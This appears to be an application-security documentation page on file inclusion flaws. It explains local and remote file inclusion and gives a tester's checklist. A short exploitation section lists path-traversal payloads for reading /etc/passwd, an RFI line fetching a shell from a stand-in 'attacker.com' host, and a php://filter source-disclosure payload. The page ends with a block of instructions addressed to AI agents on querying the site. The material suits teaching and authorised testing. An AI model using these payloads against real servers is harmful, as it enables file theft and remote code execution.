# File Inclusion

## &#x20;What is it?&#x20;

File Inclusion vulnerabilities allow an attacker to include files on a server through the web browser. This can occur in two forms: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI exploits enable attackers to read files on the server, while RFI allows attackers to execute arbitrary code by including remote files over the internet.

**A simple example**

* A vulnerable web application has the endpoint /page?file={filename}&#x20;
* When a request is made, the application dynamically includes the content of the file specified in the query parameter, for example, PHP's include() function: include($filename);&#x20;
* If an attacker modifies {filename} to a path such as `../../etc/passwd` or a remote URL `http://attacker.com/malicious.php`, they can read sensitive files or execute malicious code.&#x20;

It's important to note that the specific impact and exploitation techniques can vary depending on server configuration, programming language, and application logic. File Inclusion vulnerabilities can lead to:

* Sensitive data exposure
* Remote code execution
* Cross-site scripting

**Other learning resources:**

* \[To be updated]

**Writeups:**

Have a good writeup & want to share it here? Drop me a message on LinkedIn.

## Checklist

* [ ] What is the technology stack you're attacking?&#x20;
  * [ ] What server-side language is being used (PHP, JSP, ASP, etc.)&#x20;
  * [ ] Is the application running on a standard web server (Apache, Nginx, IIS)?&#x20;
* [ ] Identify potential injection points&#x20;
  * [ ] URL parameters&#x20;
  * [ ] Form fields&#x20;
  * [ ] HTTP headers (e.g., Referer, User-Agent)&#x20;
* [ ] Test for Local File Inclusion (LFI)&#x20;
  * [ ] Can you access local files? (e.g., ../../../etc/passwd)&#x20;
  * [ ] Test with common Unix and Windows paths&#x20;
  * [ ] Test for null byte injection (e.g., ../../../etc/passwd%00)&#x20;
* [ ] Test for Remote File Inclusion (RFI)&#x20;
  * [ ] Can you include remote files? (e.g., <http://attacker.com/malicious.php)&#x20>;
  * [ ] Test for protocol wrappers (e.g., php\://, data://)&#x20;
* [ ] Is user input properly validated and sanitized?&#x20;
* [ ] Are only allow-listed files allowed to be included?&#x20;
* [ ] Is the application configured to disallow remote file inclusion?

## Exploitation// Some code

```
# Basic LFI to read 
/etc/passwd 
../../../../etc/passwd
```

```
# RFI to execute a remote shell 
http://attacker.com/malicious.php
```

```
# Using PHP wrappers to bypass restrictions 
php://filter/convert.base64-encode/resource=index.php
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.